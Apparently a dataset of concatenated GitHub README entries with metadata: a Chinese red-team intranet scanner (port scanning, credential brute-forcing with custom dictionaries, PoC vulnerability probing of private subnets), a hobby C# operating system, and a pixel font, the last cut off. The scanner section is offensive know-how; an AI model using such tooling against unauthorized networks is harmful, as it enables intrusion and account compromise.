# Template - ๅฏๅ‘ๅผๅ†…็ฝ‘ๆ‰ซๆ ![GitHub Repo stars](https://img.shields.io/github/stars/1n7erface/Template?color=success) ![GitHub forks](https://img.shields.io/github/forks/1n7erface/Template) ![GitHub all release](https://img.shields.io/github/downloads/1n7erface/Template/total?color=blueviolet) ![](https://img.shields.io/badge/KCon-%E5%85%B5%E5%99%A8%E8%B0%B1-red) ## 0x01 ๅ…่ดฃๅฃฐๆ˜Ž ๆœฌๅทฅๅ…ทๆ—จๅœจๆไพ›ๅฎ‰ๅ…จ่ฏ„ไผฐๅ’Œๆผๆดžๆ‰ซๆ็ญ‰็›ธๅ…ณๆœๅŠก๏ผŒไฝ†ไฝฟ็”จๆœฌๅทฅๅ…ทๆ—ถ่ฏทๆณจๆ„ไปฅไธ‹ไบ‹้กน๏ผš - ๆœฌๅทฅๅ…ท็š„ไฝฟ็”จ่€…ๅบ”ๅฏนๅ…ถไฝฟ็”จไบง็”Ÿ็š„็ป“ๆžœๅ’ŒๅŽๆžœ่ดŸๅ…จ้ƒจ่ดฃไปปใ€‚ๆœฌๅทฅๅ…ทไป…ไฝœไธบ่พ…ๅŠฉๅทฅๅ…ทๆไพ›๏ผŒไธๅฏนไฝฟ็”จ่€…ๆ‰€่ฟ›่กŒ็š„ๆ“ไฝœๅ’Œๅ†ณ็ญ–ๆ‰ฟๆ‹…่ดฃไปปใ€‚ - ๆœฌๅทฅๅ…ทๅฐฝๅŠ›ๆไพ›ๅ‡†็กฎใ€ๅŠๆ—ถ็š„ไฟกๆฏๅ’Œ่ฏ„ไผฐ๏ผŒไฝ†ๆ— ๆณ•ไฟ่ฏๅ…ถๅฎŒๅ…จๆ— ่ฏฏใ€‚ไฝฟ็”จ่€…ๅบ”่‡ช่กŒๅˆคๆ–ญๅ’Œ้ชŒ่ฏๆœฌๅทฅๅ…ทๆไพ›็š„ไฟกๆฏ๏ผŒๅนถๅฏนไฝฟ็”จๆœฌๅทฅๅ…ทๆ‰€ไบง็”Ÿ็š„็ป“ๆžœ่ฟ›่กŒ็‹ฌ็ซ‹่ฏ„ไผฐใ€‚ ่ฏทๅœจไฝฟ็”จๆœฌๅทฅๅ…ทไน‹ๅ‰ไป”็ป†้˜…่ฏปๅนถ็†่งฃไธŠ่ฟฐๅ…่ดฃๅฃฐๆ˜Žใ€‚ไฝฟ็”จๆœฌๅทฅๅ…ทๅณ่กจ็คบๆ‚จๅŒๆ„้ตๅฎˆไธŠ่ฟฐๆกๆฌพ๏ผŒๅนถ่‡ช่กŒๆ‰ฟๆ‹…็›ธๅบ”่ดฃไปปใ€‚ ## 0x02 ๅทฅๅ…ทไผ˜ๅŠฟ - ๆ‰€ๆœ‰ๆจกๅ—็š†้‡‡็”จ็”Ÿไบง่€…ๆถˆ่ดน่€…ๆจกๅž‹,ๅณ็”Ÿๅณๆถˆ. > ๅœจ็ซฏๅฃๆ‰ซๆไธ€็ป„ๆ•ฐๆฎๅŽๅฐ†ๆ•ฐๆฎๅ‘้€ๅˆฐ้˜Ÿๅˆ—ไธญ,็”ฑ็ˆ†็ ดๆจกๅ—ๅ’ŒๆŒ‡็บนๆจกๅ—ๅณๅˆป่ฟ›่กŒๆถˆ่ดน,้šๆ—ถ็ป“ๆŸๆ‰ซๆ่ฟ›็จ‹ๆ‹ฟๅˆฐๆ‰ซๆ็ป“ๆžœ.ๆ‘†่„ฑไผ ็ปŸ็š„็ญ‰ๅพ…็ซฏๅฃๆ‰ซๆ็ป“ๆŸ่ฟ›่กŒๅŽ็ปญ็š„ๆจกๅž‹. - ๆ‰€ๆœ‰ๆจกๅ—็š†้‡‡็”จๅฏๅ‘ๅผๆ‰ซๆ,่ฏฃๅœจๆœ€ๅฐ‘็š„ๅ‘ๅŒ…ๆŽขๆต‹็›ฎๆ ‡ > ๅœจ็ซฏๅฃๆ‰ซๆๆ—ถ,้€š่ฟ‡ๅ่ฎฎ่ฏ†ๅˆซ็š„ๆ–นๅผ่ฏ†ๅˆซTOP15ๅ่ฎฎ,ๅฏนๅ…ถๅ่ฎฎ่ฟ›่กŒๆŽขๆต‹.ๆผๆดžๆŽขๆต‹ๆ˜ฏ้€š่ฟ‡ๅฏนWEBๆŒ‡็บน่ฟ›่กŒ่ฏ†ๅˆซๅŽ่ฟ›่กŒๆŽขๆต‹.ๆ‘†่„ฑไผ ็ปŸ็š„็ซฏๅฃ็ป‘ๅฎšไปฅๅŠๆผๆดžๆŽขๆต‹ๅ‘ๅŒ…้‡ๅคง็š„้—ฎ้ข˜. - ๅผบๅคง็š„WEBๆŒ‡็บนๆ”ฏๆ’‘ > ๆ„Ÿ่ฐขๆฃฑ่ง’็คพๅŒบๅฏนๆœฌๅทฅๅ…ทWEBๆŒ‡็บน็š„ๆ”ฏๆ’‘ใ€็›ฎๅ‰ๆŒ‡็บน900+,ๆŒ‡็บน่ฏ†ๅˆซๅฟซไบบไธ€ๆญฅ. - ๆž่‡ด็š„ๅบ”็”จๅนถๅ‘ > ๅœจ็ˆ†็ ดๆจกๅ—ไปฅๅŠๆผๆดžๆŽขๆต‹ใ€ๆŒ‡็บน่ฏ†ๅˆซใ€็ซฏๅฃๆ‰ซๆๆ‰€ๆœ‰ๆจกๅ—้‡‡็”จๆ•ฐๆฎๅŽŸๅญๅŒ–็š„ๆ–นๅผ่ฟ›่กŒๆž่‡ด็š„ๅนถๅ‘. ## 0x03 ๅ‚ๆ•ฐ่ฏดๆ˜Ž ``` โฏ ./App-arm64darwin-noupx _____ _ _ |_ _| | | | | | | ___ _ __ ___ _ __ | | __ _| |_ ___ | |/ _ \ '_' _ \| '_ \| |/ _' | __/ _ \ | | __/ | | | | | |_) | | (_| | || __/ \_/\___|_| |_| |_| .__/|_|\__,_|\__\___| | | by 1n7erface |_| [=] Load Success Usage of ./App-arm64darwin-noupx: -bt int BruteModule threadNum (default 200) -c string auto check 192 or 172 or 10 -e print error log -i string IP address of the host you want to scan,for example: 192.168.11.11-255 or 192.168.1.1/24 or /22 /15... -it int InfoModule threadNum (default 200) -nobrute skip brute -noping skip icmp alive -nopoc skip poc -o string output file name (default "output.txt") -onping only ping -p string custom port example: 80,8088,1-3000 -pw string Define a password dictionary for blasting -t int Timeout (default 4) -us string Define a user dictionary for blasting [=] end...... ``` - btๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆœŸๆœ›ๆŽฅๆ”ถไธ€ไธชๆ•ฐๅ€ผ็ฑปๅž‹,็”จไบŽ็ˆ†็ ดๆจกๅ—ๅผ€ๅฏ็š„ๅ็จ‹ๆ•ฐ้‡,้ป˜่ฎค็š„ๆ•ฐ้‡ไธบ200 - cๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆœŸๆœ›ๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ๏ผŒๅญ˜ๅœจไบŽ"192ใ€172ใ€10"ไธ‰ไธชๅญ—็ฌฆไธฒไน‹้—ด,็จ‹ๅบไผš่‡ชๅŠจ็š„ๆŽขๆต‹็ฝ‘ๆฎตๅญ˜ๆดป๏ผŒๅนถๅฏนๅ…ถ่ฟ›่กŒๆ‰ซๆใ€‚ๅŒ…ๆ‹ฌ192็š„192.168.0.1-192.168.255.255ใ€172็š„172.16.0.1-172.31.255.255ใ€10็š„10.0.0.1-10.255.255.255.ๅ€ผๅพ—ไธ€ๆ็š„ๆ˜ฏ,็ฝ‘ๆฎตๆŽขๆต‹ๅญ˜ๆดป็š„็ฎ—ๆณ•ๆ˜ฏไปŽๆฏไธ€ไธชcๆฎต้€‰ๆ‹ฉ1,255 ไปฅๅŠๆœŸ้—ด็š„้šๆœบ3ไธชip่ฟ›่กŒๆฃ€ๆต‹,ๅฆ‚ๆžœไธ€ไธชๅญ˜ๆดปๅฐ†ๅˆคๅฎšไธบ็ฝ‘ๆฎตๅญ˜ๆดป.ๅœจไธ€ๅฎšๅ‡ ็Ž‡ไธ‹ๅญ˜ๅœจๆผๆฎต็š„ๅฏ่ƒฝๆ— ๆณ•้ฟๅ….(10ๆฎตไธๅปบ่ฎฎไฝฟ็”จ,็ฝ‘ๆฎตๅคชๅคงๅฏ่ƒฝไบง็”Ÿ้ข„ๆœŸไน‹ๅค–็š„้”™่ฏฏ). - eๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ๆ‰“ๅฐๆœŸ้—ด็š„้”™่ฏฏๆ—ฅๅฟ—,็”จไบŽๆŽ’ๆŸฅๆ‰ซๆ็š„้—ฎ้ข˜. - iๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,ๅญ—็ฌฆไธฒ็”จไบŽๅฃฐๆ˜Ž่ฆๆ‰ซๆ็š„็ฝ‘ๆฎต,ไพ‹ๅฆ‚192.168.11.11-255 or 192.168.1.1/24 or /22 /15... ,ๆญคๅ‚ๆ•ฐๆ”ฏๆŒCIDR็š„่กจ่พพๅผ. - itๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆœŸๆœ›ๆŽฅๆ”ถไธ€ไธชๆ•ฐๅ€ผ็ฑปๅž‹,็”จไบŽไฟกๆฏๆŽขๆต‹ๆจกๅ—ๅผ€ๅฏ็š„ๅ็จ‹ๆ•ฐ้‡,ไพ‹ๅฆ‚ipๅญ˜ๆดปใ€็ซฏๅฃๆ‰ซๆใ€webๆŒ‡็บน. - nobruteๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ไธๅฏนไฟกๆฏๆŽขๆต‹็š„็ป“ๆžœ่ฟ›่กŒๆšดๅŠ›็ ด่งฃๆจกๅ—. - nopingๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ๅœจ็›ฎๆ ‡็ฝ‘ๆฎตไธๆ”ฏๆŒICMPๅ่ฎฎๆ—ถ,้€š่ฟ‡TCP่ฟ›่กŒๆŽขๆต‹. - nopocๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ไธๅฏนๆŽขๆต‹็š„WEBๆœๅŠก่ฟ›่กŒๆผๆดžๆŽขๆต‹็š„ๆจกๅ—. - oๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,็”จไบŽๅฏน็ป“ๆžœไฟๅญ˜็š„ๆ–‡ไปถๅ็งฐ,้ป˜่ฎคไธบoutput.txt. - onpingๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐไธๆŽฅๆ”ถไปปไฝ•ๅ€ผ,ๅฏน็›ฎๆ ‡็ฝ‘ๆฎตๅช่ฟ›่กŒICMP็š„ipๅญ˜ๆดปๆŽขๆต‹,ๅ…ถไฝ™ไธ€ๅพ‹ไธๅš. - pๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,ๆŒ‡ๅฎš็ซฏๅฃๆ‰ซๆ็š„็ซฏๅฃ.ไพ‹ๅฆ‚,80,8088,1-3000 (ๆณจ:ๆญคๅ‚ๆ•ฐไธ€็ปๆŒ‡ๅฎšๅˆ™ไธ่ฟ›่กŒ็จ‹ๅบ่‡ชๅธฆ็ซฏๅฃ็š„ๆ‰ซๆ) - pwๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,ๆŒ‡ๅฎš็ˆ†็ ด็š„ๅฏ†็ ๅญ—ๅ…ธ,ไพ‹ๅฆ‚ -pw ffnxjfl123,fgmgergn334 ๏ผˆๆณจ:ๆญคๅ‚ๆ•ฐไธ€็ปๆŒ‡ๅฎšๅˆ™ไธ่ฟ›่กŒ็จ‹ๅบ่‡ชๅธฆๅฏ†็ ็š„ๆ‰ซๆ) - tๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆœŸๆœ›ๆŽฅๆ”ถไธ€ไธชๆ•ฐๅ€ผ็ฑปๅž‹,็”จไบŽๅœจๆผๆดžๆ‰ซๆ,WEB่ฏ†ๅˆซๆ—ถ็š„่ถ…ๆ—ถๆ—ถ้—ด่ฎพ็ฝฎ. - usๅ‚ๆ•ฐ่ฏดๆ˜Ž > ๆญคๅ‚ๆ•ฐๆœŸๆœ›ๆŽฅๆ”ถไธ€ไธชๅญ—็ฌฆไธฒ,ๆŒ‡ๅฎš็ˆ†็ ด็š„็”จๆˆทๅๅญ—ๅ…ธ,ไพ‹ๅฆ‚ -us fwefwf,fwefwf (ๆณจ:ๆญคๅ‚ๆ•ฐไธ€็ปๆŒ‡ๅฎšๅˆ™ไธ่ฟ›่กŒ็จ‹ๅบ่‡ชๅธฆ็”จๆˆทๅ็š„ๆ‰ซๆ) - ๅฆ‚ๆžœๆƒณๆŒ‡ๅฎš็ซฏๅฃใ€็ˆ†็ ด็š„็”จๆˆทๅๅ’Œๅฏ†็ ๅนถไธ”ไป็„ถไฝฟ็”จ็จ‹ๅบ่‡ชๅธฆ็š„็ซฏๅฃใ€ๅฏ†็ ใ€็”จๆˆทๅ่ฟ›่กŒๆ‰ซๆ.ๅฏไปฅๅœจๅฝ“ๅ‰็จ‹ๅบ็š„ๅŒ็บง็›ฎๅฝ•ไธŠไผ ๅไธบ"config.json"็š„ๆ–‡ไปถ > ๅ†…ๅฎนไธบ: {"pass":["ffnxjfl123","fgmgergn334"],"user":["fwefwf","fwefwf"],"ports":[9999,8888]} ## 0x04 ไฝฟ็”จๆˆชๅ›พ <img width="1000" alt="image" src="https://github.com/1n7erface/Template/assets/52184829/e14e0992-2931-4c57-a502-e3d029f41020"> <img width="1000" alt="image" src="https://github.com/1n7erface/Template/assets/52184829/42b66291-57dc-40fe-9f13-6dc75ed6fb48"> ## 0x05 ๅ†™ๅœจๆœ€ๅŽ > ๅฏนๅพ…ไธ€ไธชไบงๅ“ๆˆ–ๅทฅๅ…ท,ๆˆ‘ๅธŒๆœ›ๆณจๅ…ฅ่‡ชๅทฑ็™พๅˆ†็™พ็š„ๅฟƒ่ก€ไธŽไป˜ๅ‡บ,ๆˆ‘ๅฏไปฅไธ€็›ดๅŽป้‡ๆž„็›ดๅˆฐๆˆ‘่ฎคไธบ็š„ๆปกๆ„,่ฟ™ๅคงๆฆ‚ๆ˜ฏไธ€ไธชๆŠ€ๆœฏไบบ็š„ๆ‰ง็€. > > ไธๆœ‰่ถฃ,ๆฏ‹ๅฎๆญป.
Next generation RedTeam heuristic intranet scanning | ไธ‹ไธ€ไปฃRedTeamๅฏๅ‘ๅผๅ†…็ฝ‘ๆ‰ซๆ
scanner,security-tools,poc
21
1
0
43
5
1
0
nifanfa/MOOS
[![Language switcher](https://img.shields.io/badge/Language%20%2F%20%E8%AF%AD%E8%A8%80-English%20%2F%20%E8%8B%B1%E8%AF%AD-blue)](https://github.com/nifanfa/MOOS/blob/main/README_CN.md) <p align="center"> <img width=300 src="MOOS-Logo.svg"/> </p> <p align="center"> <a href="https://github.com/nifanfa/moos/issues"><img alt="GitHub issues" src="https://img.shields.io/github/issues/nifanfa/moos"></a> <a href="https://github.com/nifanfa/moos/network"><img alt="GitHub forks" src="https://img.shields.io/github/forks/nifanfa/moos"></a> <a href="https://github.com/nifanfa/moos/stargazers"><img alt="GitHub stars" src="https://img.shields.io/github/stars/nifanfa/moos"></a> <a href="https://github.com/nifanfa/moos"><img alt="GitHub license" src="https://img.shields.io/github/license/nifanfa/moos"></a> <a href="https://github.com/nifanfa/MOOS/blob/main/LICENSE"><img alt="GitHub license" src="https://img.shields.io/github/license/nifanfa/moos"></a> <a href="https://discord.gg/uJstXbx8Pt"><img src="https://discordapp.com/api/guilds/987075686256762890/widget.png?style=shield" alt="Discord Shield"/></a> </p> # MOOS MOOS (**M**y **O**wn **O**perating **S**ystem Project) is a C# x64 operating system compiler with the .NET 7 Native AOT technology. ## Building For information on compiling MOOS, please read the [build wiki page]([https://github.com/nifanfa/MOOS/wiki/How-do-you-build-or-compile-MOOS%3](https://github.com/nifanfa/MOOS/wiki)F). ### Build requirements - VMware Workstation Player - https://www.vmware.com/products/workstation-player.html - Visual studio 2022 - https://visualstudio.microsoft.com/ - QEMU - https://www.qemu.org/download or VMWare ( Note - USB Does not work with VMWare and you need x64 if you want to run VMware, 32 bit is not supported ) - Windows 10-11 x64 or x86 - A CPU from at least 2012 or newer, or in basic terms an Ivy Bridge CPU or over - 4GB of RAM but 8GB is recommended <br/> <hr/> <br/> ![image](Screenshot3.png) ## Features | Feature | Working in VM | Working on hardware | Information | | ------- | ------------- | ------------------- | ----------- | | Applications .mue (MOOS User Executable) | ๐ŸŸฉ | ๐ŸŸฉ | | Error Throwing / Catching | ๐ŸŸฅ | ๐ŸŸฅ | | GC | ๐ŸŸจ | โฌœ | Not safe | | Multiprocessor | ๐ŸŸฉ | ๐ŸŸฉ | | Multithreading | ๐ŸŸฉ | ๐ŸŸฉ | | EHCI(USB2.0) | ๐ŸŸฉ | ๐ŸŸฉ | | USB Keyboard | ๐ŸŸจ | โฌœ | | USB Mouse | ๐ŸŸฉ | โฌœ | | USB HUB | ๐ŸŸฅ | ๐ŸŸฅ | | PS2 Keyboard/Mouse(USB Compatible) | ๐ŸŸฉ | ๐ŸŸฉ | | Nintendo Family Computer Emulator | ๐ŸŸฉ | ๐ŸŸฉ | | DOOM(doomgeneric) | ๐ŸŸฉ | ๐ŸŸฉ | | Intelยฎ Gigabit Ethernet Network | ๐ŸŸฉ | ๐ŸŸฉ | | Realtek RTL8111E | ๐ŸŸฉ | ๐ŸŸฉ | | ExFAT | ๐ŸŸฉ | โฌœ | | I/O APIC | ๐ŸŸฉ | ๐ŸŸฉ | | Local APIC | ๐ŸŸฉ | ๐ŸŸฉ | | SATA | ๐ŸŸฉ | โฌœ | | IDE | ๐ŸŸฉ | ๐ŸŸฉ | | SMBIOS | ๐ŸŸฉ | ๐ŸŸฉ | | ACPI | ๐ŸŸฉ | ๐ŸŸฉ | | IPv4 | ๐ŸŸฉ | ๐ŸŸฉ | | IPv6 | ๐ŸŸฅ | ๐ŸŸฅ | | TCP | ๐ŸŸฉ | ๐ŸŸฉ | | UDP | ๐ŸŸฉ | ๐ŸŸฉ | | DNS | ๐ŸŸฉ | ๐ŸŸฉ | | DHCP | ๐ŸŸฉ | ๐ŸŸฉ | | Lan | ๐ŸŸฉ | ๐ŸŸฉ | | Wan | ๐ŸŸฉ | ๐ŸŸฉ | | Color Key | Meaning | | ----- | ------- | | ๐ŸŸฉ | Yes | | ๐ŸŸฅ | No | | ๐ŸŸจ | W.I.P / Partially / Buggy | | โฌœ | Unknown | ## Contact me ่”็ณปๆ–นๅผ Email: nifanfa@foxmail.com (i hardly use that so it may took a few month to check your post) QQ: 3244735564 QQ็พค: 686383293 Discord: https://discord.gg/uJstXbx8Pt
C# x64 operating system programming with the .NET native ahead-of-time compilation technology.
csharp,operating-system,nativeaot,corert,hobby-os,os,multithreading,smp
1
9
39
1,336
13
1
0
TakWolf/fusion-pixel-font
![banner](docs/logo@2x.png) # ็ผๅˆๅƒ็ด ๅญ—ไฝ“ / Fusion Pixel Font [![License OFL](https://img.shields.io/badge/license-OFL--1.1-orange)](https://openfontlicense.org) [![License MIT](https://img.shields.io/badge/license-MIT-green)](https://opensource.org/licenses/MIT) [![Releases](https://img.shields.io/github/v/release/TakWolf/fusion-pixel-font)](https://github.com/TakWolf/fusion-pixel-font/releases) [![Discord](https://img.shields.io/badge/discord-ๅƒ็ด ๅญ—ไฝ“ๅทฅๆˆฟ-4E5AF0?logo=discord&logoColor=white)](https://discord.gg/3GKtPKtjdU) [![QQ Group](https://img.shields.io/badge/QQ็พค-ๅƒ็ด ๅญ—ไฝ“ๅทฅๆˆฟ-brightgreen?logo=tencentqq&logoColor=white)](https://qm.qq.com/q/X1mLrLLGYS) ๅผ€ๆบ็š„ๆณ›ไธญๆ—ฅ้Ÿฉๅƒ็ด ๅญ—ไฝ“๏ผŒ้ป‘ไฝ“ๆ— ่กฌ็บฟ้ฃŽๆ ผ๏ผŒๆ”ฏๆŒ 8ใ€10 ๅ’Œ 12 ๅƒ็ด ใ€‚ ่ฏฅ้กน็›ฎไธบ [ใ€Œๆ–น่ˆŸๅƒ็ด ๅญ—ไฝ“ใ€](https://github.com/TakWolf/ark-pixel-font) ็š„ไธดๆ—ถๆ€ง่ฟ‡ๆธกๆ–นๆกˆใ€‚ไฝฟ็”จๅคšไธชๅƒ็ด ๅญ—ไฝ“ๅˆๅนถ่€Œๆˆ๏ผŒๅ› ๆญคไปฅใ€Œ็ผๅˆใ€ๅ‘ฝๅใ€‚ Logo ๆไป–่‡ช [ใ€Šๆธธๆˆ็Ž‹ใ€‹](https://zh.wikipedia.org/wiki/%E9%81%8A%E6%88%B2%E7%8E%8B) ไธญ็š„ [ใ€Œ่žๅˆใ€](https://www.db.yugioh-card.com/yugiohdb/card_search.action?ope=2&cid=4837&request_locale=ja) ้ญ”ๆณ•ๅกๅกๅ›พใ€‚ ่ฟ™ไธช้กน็›ฎๆไพ›ไบ†ไปŽๆๅ–ๅญ—ๆจก๏ผŒๅˆๅนถๅญ—ๅฝขๅˆฐๆž„ๅปบๅญ—ไฝ“ๆ‰€้œ€่ฆ็š„ๅฎŒๆ•ด็จ‹ๅบใ€‚ ## ้ข„่งˆ ๅฏไปฅ้€š่ฟ‡ [Playground](https://fusion-pixel-font.takwolf.com/playground.html) ๅฎžๆ—ถ้ข„่งˆๅญ—ไฝ“ๆ•ˆๆžœใ€‚ ### 8 ๅƒ็ด  [็คบไพ‹ๆ–‡ๆœฌ](https://fusion-pixel-font.takwolf.com/demo-8px.html) ยท [็ญ‰ๅฎฝๆจกๅผ-ๅญ—ๆฏ่กจ](https://fusion-pixel-font.takwolf.com/alphabet-8px-monospaced.html) ยท [ๆฏ”ไพ‹ๆจกๅผ-ๅญ—ๆฏ่กจ](https://fusion-pixel-font.takwolf.com/alphabet-8px-proportional.html) ![preview-8px](docs/preview-8px.png) ### 10 ๅƒ็ด  [็คบไพ‹ๆ–‡ๆœฌ](https://fusion-pixel-font.takwolf.com/demo-10px.html) ยท [็ญ‰ๅฎฝๆจกๅผ-ๅญ—ๆฏ่กจ](https://fusion-pixel-font.takwolf.com/alphabet-10px-monospaced.html) ยท [ๆฏ”ไพ‹ๆจกๅผ-ๅญ—ๆฏ่กจ](https://fusion-pixel-font.takwolf.com/alphabet-10px-proportional.html) ![preview-10px](docs/preview-10px.png) ### 12 ๅƒ็ด  [็คบไพ‹ๆ–‡ๆœฌ](https://fusion-pixel-font.takwolf.com/demo-12px.html) ยท [็ญ‰ๅฎฝๆจกๅผ-ๅญ—ๆฏ่กจ](https://fusion-pixel-font.takwolf.com/alphabet-12px-monospaced.html) ยท [ๆฏ”ไพ‹ๆจกๅผ-ๅญ—ๆฏ่กจ](https://fusion-pixel-font.takwolf.com/alphabet-12px-proportional.html) ![preview-12px](docs/preview-12px.png) ## ๅญ—็ฌฆ็ปŸ่ฎก ๅฏไปฅ้€š่ฟ‡ไธ‹้ข็š„้“พๆŽฅๆฅๆŸฅ็œ‹ๅญ—ไฝ“ๅ„ๅฐบๅฏธ็›ฎๅ‰ๆ”ฏๆŒ็š„ๅญ—็ฌฆๆƒ…ๅ†ตใ€‚ | ๅฐบๅฏธ | ็ญ‰ๅฎฝๆจกๅผ | ๆฏ”ไพ‹ๆจกๅผ | |---|---|---| | 8px | [font-info-8px-monospaced](docs/font-info-8px-monospaced.md) | [font-info-8px-proportional](docs/font-info-8px-proportional.md) | | 10px | [font-info-10px-monospaced](docs/font-info-10px-monospaced.md) | [font-info-10px-proportional](docs/font-info-10px-proportional.md) | | 12px | [font-info-12px-monospaced](docs/font-info-12px-monospaced.md) | [font-info-12px-proportional](docs/font-info-12px-proportional.md) | ## ่ฏญ่จ€็‰นๅฎšๅญ—ๅฝข ็›ฎๅ‰ๆ”ฏๆŒไปฅไธ‹่ฏญ่จ€็‰นๅฎšๅญ—ๅฝข็‰ˆๆœฌ๏ผš | ็‰ˆๆœฌ | ๅซไน‰ | |---|---| | latin | ๆ‹‰ไธ่ฏญ | | zh_hans | ไธญๆ–‡-็ฎ€ไฝ“ | | zh_hant | ไธญๆ–‡-็น้ซ” | | ja | ๆ—ฅ่ฏญ | | ko | ๆœ้ฒœ่ฏญ | ๅฐฝ็ฎกๅฆ‚ๆญค๏ผŒ่ฟ™ไธช้กน็›ฎไป็„ถๆ˜ฏไธ€ไธชๅŸบไบŽ่กฅไธ็š„ๅญ—ไฝ“่งฃๅ†ณๆ–นๆกˆใ€‚ไฝ ไธๅบ”่ฏฅๅฏน่ฏญ่จ€็‰นๅฎšๅญ—ๅฝขๆŠฑๆœ‰็‰นๅˆซ็š„ๆœŸๅพ…ใ€‚ ## ไธ‹่ฝฝ ๅฏ้€š่ฟ‡ไปฅไธ‹ๆธ ้“ไธ‹่ฝฝๆœ€ๆ–ฐ็š„็‰ˆๆœฌ๏ผš - [GitHub Releases](https://github.com/TakWolf/fusion-pixel-font/releases) ็›ฎๅ‰ๆไพ› `.otf`ใ€`.ttf`ใ€`.woff2`ใ€`.bdf`ใ€`.pcf` ไบ”็งๅ•ๅญ—ไฝ“ๆ ผๅผ๏ผŒไปฅๅŠ `.otc`ใ€`.ttc` ไธค็ง้›†ๅˆๅญ—ไฝ“ๆ ผๅผใ€‚ ## ๆŽˆๆƒ่ฎธๅฏ ๅˆ†ไธบใ€Œๅญ—ไฝ“ใ€ๅ’Œใ€Œๆž„ๅปบ็จ‹ๅบใ€ไธคไธช้ƒจๅˆ†ใ€‚ ### ๅญ—ไฝ“ ไฝฟ็”จ [ใ€ŒSIL ๅผ€ๆ”พๅญ—ไฝ“่ฎธๅฏ่ฏ็ฌฌ 1.1 ็‰ˆใ€](LICENSE-OFL) ๆŽˆๆƒ๏ผŒไฟ็•™ๅญ—ไฝ“ๅ็งฐใ€Œ็ผๅˆๅƒ็ด  / Fusion Pixelใ€ใ€‚ ็ฌฌไธ‰ๆ–นๅญ—ๆบ่ฎธๅฏ่ฏๅฆ‚ไธ‹๏ผš | ๅญ—ไฝ“ | ่ฎธๅฏ่ฏ | ๅค‡ๆณจ | |---|---|---| | [ๆ–น่ˆŸๅƒ็ด ๅญ—ไฝ“ / Ark Pixel Font](https://github.com/TakWolf/ark-pixel-font) | [OFL-1.1](https://github.com/TakWolf/ark-pixel-font/blob/develop/LICENSE-OFL) | ๆไพ› 10ใ€12 ๅƒ็ด ๅŸบ็ก€ๅญ—ๅฝขๅ’Œๅ‚ๆ•ฐ | | [็พŽๅ’ฒใƒ•ใ‚ฉใƒณใƒˆ / Misaki](https://littlelimit.net/misaki.htm) | [ๆ— ็ฑปๅž‹่ฎธๅฏ่ฏ](assets/fonts/misaki/LICENSE.txt)๏ผŒๅ…ผๅฎน OFL-1.1 | ๆไพ› 8 ๅƒ็ด ๆ—ฅ่ฏญๆฑ‰ๅญ—ๅญ—ๅฝข | | [็พŽ็ธพ็‚น้™ฃ้ซ” / MisekiBitmap](https://github.com/ItMarki/MisekiBitmap) | [OFL-1.1](https://github.com/ItMarki/MisekiBitmap/blob/main/LICENSE) | ๆไพ› 8 ๅƒ็ด ็ฎ€ไฝ“ไธญๆ–‡ๆฑ‰ๅญ—ๅญ—ๅฝข | | [็ฒพๅ“้ปž้™ฃ้ซ”7ร—7 / BoutiqueBitmap7x7](https://github.com/scott0107000/BoutiqueBitmap7x7) | [OFL-1.1](https://github.com/scott0107000/BoutiqueBitmap7x7/blob/main/OFL.txt) | ๆไพ› 8 ๅƒ็ด ็นไฝ“ไธญๆ–‡ๆฑ‰ๅญ—ๅญ—ๅฝข | | [็ฒพๅ“้ปž้™ฃ้ซ”9ร—9 / BoutiqueBitmap9x9](https://github.com/scott0107000/BoutiqueBitmap9x9) | [OFL-1.1](https://github.com/scott0107000/BoutiqueBitmap9x9/blob/main/OFL.txt) | ๆไพ› 10 ๅƒ็ด ็นไฝ“ไธญๆ–‡ๆฑ‰ๅญ—่กฅๅ…… | | [ไฟๆ–น้ซ”11่™Ÿ๏ผCubic 11](https://github.com/ACh-K/Cubic-11) | [OFL-1.1](https://github.com/ACh-K/Cubic-11/blob/main/OFL.txt) | ๆไพ› 12 ๅƒ็ด ็นไฝ“ไธญๆ–‡ๆฑ‰ๅญ—่กฅๅ…… | | [Galmuri](https://github.com/quiple/galmuri) | [OFL-1.1](https://github.com/quiple/galmuri/blob/main/ofl.md) | ๆไพ› 8ใ€10ใ€12 ๅƒ็ด ๆœ้ฒœ่ฏญ็›ธๅ…ณๅญ—ๅฝข | ### ๆž„ๅปบ็จ‹ๅบ ไฝฟ็”จ [ใ€ŒMIT ่ฎธๅฏ่ฏใ€](LICENSE-MIT) ๆŽˆๆƒใ€‚ ## ๅฎ˜ๆ–น็คพๅŒบ - [ใ€Œๅƒ็ด ๅญ—ไฝ“ๅทฅๆˆฟใ€Discord ๆœๅŠกๅ™จ](https://discord.gg/3GKtPKtjdU) - [ใ€Œๅƒ็ด ๅญ—ไฝ“ๅทฅๆˆฟใ€QQ ็พค (302383204)](https://qm.qq.com/q/X1mLrLLGYS) ## ็จ‹ๅบไพ่ต– - [Pixel Font 